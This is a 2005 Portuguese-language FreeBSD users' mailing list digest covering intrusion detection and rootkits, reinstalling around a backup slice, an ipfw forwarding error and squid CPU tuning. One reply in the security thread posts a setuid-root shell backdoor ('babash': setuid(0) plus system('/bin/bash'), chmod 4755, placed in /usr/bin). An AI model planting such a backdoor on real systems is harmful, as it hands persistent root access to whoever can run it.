[FUG-BR] segurança
all, Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD, ganhando acesso root, esse alguém fica totalmente invisível? ou os comandos w, who, etc identificam o invasor? Celso ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] segurança
Depende, se ele instalar rootkits que sobrescrevam essas ferramentas trocando as por outras de uso igual e não mostrem seu user, ou até mesmo alterando as chamadas a nivel de kernel para nao ser pego via um md5 qualquer do binario. On Apr 8, 2005 8:48 AM, Celso Viana [EMAIL PROTECTED] wrote: all, Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD, ganhando acesso root, esse alguém fica totalmente invisível? ou os comandos w, who, etc identificam o invasor? Celso ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] segurança
depende vc usa secure level kernel pq se nao usa ele pode colocar um rootkit facilmente em sue sistema :) Celso Viana wrote: all, Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD, ganhando acesso root, esse alguém fica totalmente invisível? ou os comandos w, who, etc identificam o invasor? Celso ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] segurança
sim.. uso secure level 2 o cenário seria esse: tendo acabado de instalar o OS, instalei um software que tem uma falha de segurança e eu não sei disso; essa máquina está visível para o mundo (ip real); essa máquina ainda não foi atualizada; o OS está em secure level 2; minha dúvida: imaginemos que alguém, nesse momento, descobriu essa máquina e resolva explorar essa vulnerabilidade e tenha ganhado acesso root; eu, estando logado no console, posso identificar esse invasor? ele está visível para os comandos do sistema? é possível fazer com que o sistema emita um alarme qdo esse invasor consiga o acesso? Celso Celso On Apr 8, 2005 9:59 AM, Christopher Giese - IRAPIDA [EMAIL PROTECTED] wrote: depende vc usa secure level kernel pq se nao usa ele pode colocar um rootkit facilmente em sue sistema :) Celso Viana wrote: all, Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD, ganhando acesso root, esse alguém fica totalmente invisível? ou os comandos w, who, etc identificam o invasor? Celso ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
RES: [FUG-BR] segurança
Oi pessoal, Tentem isso: vi babash.c #include stdlib.h main () { setuid(0); system(/bin/bash); } /usr/local/bin/gcc babash.c -o babash chmod 4755 babash mv babash /usr/bin/babash Não me lembro quem escreveu esse brinquedo. Não fui eu pois meu conhecimento em C é pobre... Tem rodado em maquinas solaris 8, 9 e Linux... Ainda não rodei no BSD ... Abraço -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Celso Viana Enviada em: sexta-feira, 8 de abril de 2005 10:12 Para: Lista de discussao do grupo FUG-BR Assunto: Re: [FUG-BR] segurança sim.. uso secure level 2 o cenário seria esse: tendo acabado de instalar o OS, instalei um software que tem uma falha de segurança e eu não sei disso; essa máquina está visível para o mundo (ip real); essa máquina ainda não foi atualizada; o OS está em secure level 2; minha dúvida: imaginemos que alguém, nesse momento, descobriu essa máquina e resolva explorar essa vulnerabilidade e tenha ganhado acesso root; eu, estando logado no console, posso identificar esse invasor? ele está visível para os comandos do sistema? é possível fazer com que o sistema emita um alarme qdo esse invasor consiga o acesso? Celso Celso On Apr 8, 2005 9:59 AM, Christopher Giese - IRAPIDA [EMAIL PROTECTED] wrote: depende vc usa secure level kernel pq se nao usa ele pode colocar um rootkit facilmente em sue sistema :) Celso Viana wrote: all, Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD, ganhando acesso root, esse alguém fica totalmente invisível? ou os comandos w, who, etc identificam o invasor? Celso ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] segurança
isto tudo eh muito ~volatil~ (rs) Se o binario que vc for usufruir (who) por exemplo nao estiver alterado... blz... ele ira funcionar mas como vc vai garantir isto e tem outra depende da tecnica utilizada como o sistema vai ter certeza se eh ou nao um usuario que possa acessar a maquina. eu costumo usar chflags em binarios principais (nao eh 100% mas ja ajuda bastante) e arrancar o binario chflags do sistema o ideal eh vc ter no sistema somente o necessario o correto na gerdade eh vc terminar o server.. fazer tudo filezinho e arrancar tudo o que nao for mais util (o gcc por exemplo.) ai vc dificulta bastante o atacante. mas claro que tb te dificulta numa possivel manutencao/atualizacao :) Celso Viana wrote: sim.. uso secure level 2 o cenário seria esse: tendo acabado de instalar o OS, instalei um software que tem uma falha de segurança e eu não sei disso; essa máquina está visível para o mundo (ip real); essa máquina ainda não foi atualizada; o OS está em secure level 2; minha dúvida: imaginemos que alguém, nesse momento, descobriu essa máquina e resolva explorar essa vulnerabilidade e tenha ganhado acesso root; eu, estando logado no console, posso identificar esse invasor? ele está visível para os comandos do sistema? é possível fazer com que o sistema emita um alarme qdo esse invasor consiga o acesso? Celso Celso On Apr 8, 2005 9:59 AM, Christopher Giese - IRAPIDA [EMAIL PROTECTED] wrote: depende vc usa secure level kernel pq se nao usa ele pode colocar um rootkit facilmente em sue sistema :) Celso Viana wrote: all, Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD, ganhando acesso root, esse alguém fica totalmente invisível? ou os comandos w, who, etc identificam o invasor? Celso ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] segurança
isto tudo eh muito ~volatil~ (rs) Ja fiz certa vez o seguinte instalei tudo cologuei o / como ro e os programas como gcc, chflags, vipw entre outros e inclusive uma copia zipada do /bin e /usr/bin em um disco dentro da maquina mas esse desligado, so ligando quando e necessario fazer a instala cao, mas isso e paranoia demais Rizzo Se o binario que vc for usufruir (who) por exemplo nao estiver alterado... blz... ele ira funcionar mas como vc vai garantir isto e tem outra depende da tecnica utilizada como o sistema vai ter certeza se eh ou nao um usuario que possa acessar a maquina. eu costumo usar chflags em binarios principais (nao eh 100% mas ja ajuda bastante) e arrancar o binario chflags do sistema o ideal eh vc ter no sistema somente o necessario o correto na gerdade eh vc terminar o server.. fazer tudo filezinho e arrancar tudo o que nao for mais util (o gcc por exemplo.) ai vc dificulta bastante o atacante. mas claro que tb te dificulta numa possivel manutencao/atualizacao :) Celso Viana wrote: sim.. uso secure level 2 o cenário seria esse: tendo acabado de instalar o OS, instalei um software que tem uma falha de segurança e eu não sei disso; essa máquina está visível para o mundo (ip real); essa máquina ainda não foi atualizada; o OS está em secure level 2; minha dúvida: imaginemos que alguém, nesse momento, descobriu essa máquina e resolva explorar essa vulnerabilidade e tenha ganhado acesso root; eu, estando logado no console, posso identificar esse invasor? ele está visível para os comandos do sistema? é possível fazer com que o sistema emita um alarme qdo esse invasor consiga o acesso? Celso Celso On Apr 8, 2005 9:59 AM, Christopher Giese - IRAPIDA [EMAIL PROTECTED] wrote: depende vc usa secure level kernel pq se nao usa ele pode colocar um rootkit facilmente em sue sistema :) Celso Viana wrote: all, Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD, ganhando acesso root, esse alguém fica totalmente invisível? ou os comandos w, who, etc identificam o invasor? Celso ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
[FUG-BR] reinstalar sistema
all, Para instalar o FreeBSD em uma máquina, criei um slice no disco inteiro; depois criei o sistema de arquivos: / /usr /var /tmp /backup é possível reinstalar esse sistema, preservando tudo que está em /backup? Celso ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] OT - Graficos complexos com mrtg
Nilton, Pessoal existe alguma maneira de fazer um grafico no mrtg com mais de duas entradas? E que preiso comprar o consumo de 10 maquinas com o trafego de saida do link. Tudo que vi com o mrtg o grafico so possui dois dados ... :( Alguem usa uma outra solucao para isso? Dê uma olhada no rrdtool []s Ronan ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
[FUG-BR] regra fwd
All, Num FreeBSD 5.3 sem atualização adiciono a regra ... teste# ipfw add fwd 3128,10.10.10.5 dst-port 80 e a regra é adicionada normalmente 00100 fwd 0.0.12.56,10 ip from any to any dst-port 80 num FreeBSD 5.3 p5 teste# ipfw add fwd 3128,10.10.10.5 dst-port 80 ipfw: getsockopt(IP_FW_ADD): Invalid argument se eu explicito... ipfw add fwd 3128,10.10.10.5 all from any to any dst-port 80 acontece o mesmo erro; o que pode ser? Celso ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] reinstalar sistema
Celso, Como você está reinstalando o sistme? Você quer dizer atualizar o SO via cvsup? Se for isso, a atualização do sistema não deverá apagar nada, apenas atualizar os arquivos do SO da versão antiga para a versão nova. Inclusive até os ports instalados ficam os mesmos antigo. []s Ronan ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] reinstalar sistema
Ronan, Seria reinstalar mesmo. do zero, com o CD de instalação. Celso On Apr 8, 2005 2:23 PM, Ronan Lucio [EMAIL PROTECTED] wrote: Celso, Como você está reinstalando o sistme? Você quer dizer atualizar o SO via cvsup? Se for isso, a atualização do sistema não deverá apagar nada, apenas atualizar os arquivos do SO da versão antiga para a versão nova. Inclusive até os ports instalados ficam os mesmos antigo. []s Ronan ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] reinstalar sistema
Celso Viana wrote: Ronan, Seria reinstalar mesmo. do zero, com o CD de instalação. Lembrese qual era essa slice (ad0s1g, por exemplo) e na hora da instalação não remova ela e adicione o ponto de montagem como antigamente. Não peça para formatar também. -- Giovanni P. Tirloni / [EMAIL PROTECTED] / PGP: 0xD0315C26 ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] regra fwd
teste# ipfw add fwd 10.10.10.5,3128 all from any to any dst-port 80 ipfw: getsockopt(IP_FW_ADD): Invalid argument o kernel tá assim: options IPFIREWALL options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=100 options IPFIREWALL_DEFAULT_TO_ACCEPT options IPFIREWALL_FORWARD options IPDIVERT options DUMMYNET options HZ=1000 Celso On Apr 8, 2005 2:40 PM, Ronan Lucio [EMAIL PROTECTED] wrote: Celso, se eu explicito... ipfw add fwd 3128,10.10.10.5 all from any to any dst-port 80 acontece o mesmo erro; o que pode ser? O correto é: ipfw add fwd 10.10.10.5,3128 all from any to any dst-port 80 []s Ronan ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] regra fwd
Cara, tenta o seguinte: cd /usr/src/sbin/ipfw make -DIPFW2 cd /usr/src/lib/libalias make -DIPFW2 Não testei mas já funcionou comigo. Sucesso! Celso Viana escreveu: teste# ipfw add fwd 10.10.10.5,3128 all from any to any dst-port 80 ipfw: getsockopt(IP_FW_ADD): Invalid argument o kernel tá assim: options IPFIREWALL options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=100 options IPFIREWALL_DEFAULT_TO_ACCEPT options IPFIREWALL_FORWARD options IPDIVERT options DUMMYNET options HZ=1000 Celso On Apr 8, 2005 2:40 PM, Ronan Lucio [EMAIL PROTECTED] wrote: Celso, se eu explicito... ipfw add fwd 3128,10.10.10.5 all from any to any dst-port 80 acontece o mesmo erro; o que pode ser? O correto é: ipfw add fwd 10.10.10.5,3128 all from any to any dst-port 80 []s Ronan ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br . -- Valois Ivan Tomasi [EMAIL PROTECTED] Linux User = 380101 MASTER REDES Tecnologia da Informação (48) 265 - 3939 (48) 9104 - 7872 ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] regra fwd
Valois, O FreeBSD 5.3 já traz o ipfw2 nativamente! ou estou enganado? Celso On Apr 8, 2005 3:44 PM, Valois - Master Redes [EMAIL PROTECTED] wrote: Cara, tenta o seguinte: cd /usr/src/sbin/ipfw make -DIPFW2 cd /usr/src/lib/libalias make -DIPFW2 Não testei mas já funcionou comigo. Sucesso! Celso Viana escreveu: teste# ipfw add fwd 10.10.10.5,3128 all from any to any dst-port 80 ipfw: getsockopt(IP_FW_ADD): Invalid argument o kernel tá assim: options IPFIREWALL options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=100 options IPFIREWALL_DEFAULT_TO_ACCEPT options IPFIREWALL_FORWARD options IPDIVERT options DUMMYNET options HZ=1000 Celso On Apr 8, 2005 2:40 PM, Ronan Lucio [EMAIL PROTECTED] wrote: Celso, se eu explicito... ipfw add fwd 3128,10.10.10.5 all from any to any dst-port 80 acontece o mesmo erro; o que pode ser? O correto é: ipfw add fwd 10.10.10.5,3128 all from any to any dst-port 80 []s Ronan ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br . -- Valois Ivan Tomasi [EMAIL PROTECTED] Linux User = 380101 MASTER REDES Tecnologia da Informação (48) 265 - 3939 (48) 9104 - 7872 ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] reinstalar sistema
Ronan, Valews... outra dúvida: eu posso ter 2 slice's no mesmo HD? daí eu colocaria um /backup no 2º slice inteiro.. tudo isso é pq não é brincadeira fazer backup de 30 GB.. Celso On Apr 8, 2005 4:09 PM, Ronan Lucio [EMAIL PROTECTED] wrote: Celso, Seria reinstalar mesmo. do zero, com o CD de instalação. Cara, então não esquece de fazer um backup de tudo. Eu nunca reinstalei um servidor dessa forma. Sempre preferi formatar e reinstalar a máquina toda do zero quando o servidor era muito antigo. []s Ronan ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] regra fwd
Vc stá cero, mas já tive esse tipo de problema e resolvi com este procedimento. Derrepente Valois! Celso Viana escreveu: Valois, O FreeBSD 5.3 já traz o ipfw2 nativamente! ou estou enganado? Celso On Apr 8, 2005 3:44 PM, Valois - Master Redes [EMAIL PROTECTED] wrote: Cara, tenta o seguinte: cd /usr/src/sbin/ipfw make -DIPFW2 cd /usr/src/lib/libalias make -DIPFW2 Não testei mas já funcionou comigo. Sucesso! Celso Viana escreveu: teste# ipfw add fwd 10.10.10.5,3128 all from any to any dst-port 80 ipfw: getsockopt(IP_FW_ADD): Invalid argument o kernel tá assim: options IPFIREWALL options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=100 options IPFIREWALL_DEFAULT_TO_ACCEPT options IPFIREWALL_FORWARD options IPDIVERT options DUMMYNET options HZ=1000 Celso On Apr 8, 2005 2:40 PM, Ronan Lucio [EMAIL PROTECTED] wrote: Celso, se eu explicito... ipfw add fwd 3128,10.10.10.5 all from any to any dst-port 80 acontece o mesmo erro; o que pode ser? O correto é: ipfw add fwd 10.10.10.5,3128 all from any to any dst-port 80 []s Ronan ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br . -- Valois Ivan Tomasi [EMAIL PROTECTED] Linux User = 380101 MASTER REDES Tecnologia da Informação (48) 265 - 3939 (48) 9104 - 7872 ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br . -- Valois Ivan Tomasi [EMAIL PROTECTED] Linux User = 380101 MASTER REDES Tecnologia da Informação (48) 265 - 3939 (48) 9104 - 7872 ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] regra fwd
Valois, O que esse procedimento faz? Celso On Apr 8, 2005 4:35 PM, Valois - Master Redes [EMAIL PROTECTED] wrote: Vc stá cero, mas já tive esse tipo de problema e resolvi com este procedimento. Derrepente Valois! Celso Viana escreveu: Valois, O FreeBSD 5.3 já traz o ipfw2 nativamente! ou estou enganado? Celso On Apr 8, 2005 3:44 PM, Valois - Master Redes [EMAIL PROTECTED] wrote: Cara, tenta o seguinte: cd /usr/src/sbin/ipfw make -DIPFW2 cd /usr/src/lib/libalias make -DIPFW2 Não testei mas já funcionou comigo. Sucesso! Celso Viana escreveu: teste# ipfw add fwd 10.10.10.5,3128 all from any to any dst-port 80 ipfw: getsockopt(IP_FW_ADD): Invalid argument o kernel tá assim: options IPFIREWALL options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=100 options IPFIREWALL_DEFAULT_TO_ACCEPT options IPFIREWALL_FORWARD options IPDIVERT options DUMMYNET options HZ=1000 Celso On Apr 8, 2005 2:40 PM, Ronan Lucio [EMAIL PROTECTED] wrote: Celso, se eu explicito... ipfw add fwd 3128,10.10.10.5 all from any to any dst-port 80 acontece o mesmo erro; o que pode ser? O correto é: ipfw add fwd 10.10.10.5,3128 all from any to any dst-port 80 []s Ronan ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br . -- Valois Ivan Tomasi [EMAIL PROTECTED] Linux User = 380101 MASTER REDES Tecnologia da Informação (48) 265 - 3939 (48) 9104 - 7872 ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br . -- Valois Ivan Tomasi [EMAIL PROTECTED] Linux User = 380101 MASTER REDES Tecnologia da Informação (48) 265 - 3939 (48) 9104 - 7872 ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br ___ Freebsd mailing list Freebsd@fug.com.br http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Re: [FUG-BR] Alto consumo de CPU do squid no FreeBSD 5.4
Alex S. Moura wrote: Saudações, Alguém tem sugestões ou dicas para resolver o problema de alto consumo de CPU pelo squid no FreeBSD 5.4? Trata-se de um proxy webcache transparente, implementado com o pf e protocolo WCCP (Cisco). Eu ia perguntar como assim alto consumo de CPU, quando vi o seu top... Se voce não tem um número absurdo de regras de ACL, a única explicação que me resta é a implementação de WCCP no squid ser muito ineficiente. É bem possível. Voce precisa mesmo do WCCP? Nao pode ser simplesmente um proxy transparente e regras de policy routing desviando a porta 80 para um MAC externo? Outra sugestão: habilite um kernel com as opções: options HZ=1000 options DEVICE_POLLING Isso deve melhorar o tempo gasto com interrupções de rede. Aparentemente o número de MBUF clusters está razoável, embora eu não goste do formato do FreeBSD. O FreeBSD 4 me dava o pico de uso dos mbuf clusters, mas o 5.x não dá mais, e com isso perdemos uma ferramenta estatística. Nao sei se isso tem algo a ver com o tal do sfbuf, que não é comentado no livro do McKusick. Deve ser algo bem novo. Ah, segundo os seus dados abaixo, a placa de rede também compartilha interrupções com o USB. Se não puder separar as interrupções, desligue o USB. Acredito que não seja necessário num servidor de proxy. ;-) Uma outra otimização interessante é colocar um named local só para atender o squid. Isso reduz os acessos pela rede, reduzindo a latencia, e ainda guarda um cache local, evitando contaminar o cache externo com dados do proxy transparente. Se a rede consumidora for local e usar o mesmo named externo, ainda assim acho que vale a pena colocar um named local com forward first. Fora isso, parece tudo ok. CPU razoável, placa de rede muito boa, quantidade de memória excelente. Só faltava ser disco SCSI, mas ao que me parece, esse não é o problema da máquina. Dados relevantes: Hardware: P4 2.80GHz HT / 2GB RAM / (2x)80GB HDD / Intel PRO/1000 (em0) -- CPU: Intel(R) Pentium(R) 4 CPU 2.80GHz (2793.01-MHz 686-class CPU) Hyperthreading: 2 logical CPUs real memory = 2146631680 (2047 MB) avail memory = 2094350336 (1997 MB) cpu0: ACPI CPU on acpi0 agp0: Intel 82865 host to AGP bridge mem 0xf800-0xfbff at device 0.0 on pci0 em0: Intel(R) PRO/1000 Network Connection, Version - 1.7.35 port 0xcf80-0xcf9f mem 0xfe9e-0xfe9f irq 18 at device 1.0 on pci2 em0: Link is up 100 Mbps Full Duplex ad0: 76319MB ST380011A/3.06 [155061/16/63] at ata0-master UDMA100 ad1: 76319MB ST380011A/3.06 [155061/16/63] at ata0-slave UDMA100 ---//--//--//--- Software: FreeBSD 5.4-PRERELEASE, squid 2.5.9, pf Outras informações: -- # top -S last pid: 20950; load averages: 0.88, 0.99, 0.96 up 1+01:36:07 12:11:52 101 processes: 3 running, 65 sleeping, 33 waiting CPU states: 34.5% user, 0.0% nice, 51.6% system, 7.0% interrupt, 7.0% idle Mem: 210M Active, 1544M Inact, 180M Wired, 66M Cache, 112M Buf, 3008K Free Swap: 4069M Total, 120K Used, 4069M Free PID USERNAME PRI NICE SIZERES STATETIME WCPUCPU COMMAND 3134 squid1220 193M 190M RUN211:17 84.03% 84.03% squid 11 root 171 52 0K 8K RUN934:47 6.98% 6.98% idle 35 root -44 -163 0K 8K WAIT26:04 2.83% 2.83% swi1: net 28 root -68 -187 0K 8K WAIT14:05 1.03% 1.03% irq18: em0 uhci2 36 root -28 -147 0K 8K WAIT 2:24 0.00% 0.00% swi5: clock sio 3136 squid -40 1744K 1076K msgwai 2:07 0.00% 0.00% diskd 56 root 200 0K 8K syncer 2:00 0.00% 0.00% syncer ---//--//--//--- # systat -vmstat 1 -- 3 usersLoad 1.15 1.00 0.95 Apr 6 12:18 Mem:KBREALVIRTUAL VN PAGER SWAP PAGER Tot Share TotShareFree in out in out Act 2094444416 261896 6540 82364 count All 20459527132 450039210168 pages Interrupts Proc:r p d s wCsw Trp Sys Int Sof Fltcow1515 total 1 4 32 3680 730 5051 2944 1139 183612 wire1: atkb 215036 act 3: sio1 52.2%Sys 3.7%Intr 28.4%User 0.0%Nice 15.7%Idl 1569204 inact 4: sio0 |||||||||| 79356 cache 6: fdc0 ==++ 3008 free128 8: rtc daefr 13: npx Namei Name-cacheDir-cache prcfr 14: ata Calls hits% hits% react 15: ata 47 37 79 pdwak 1288 18: em0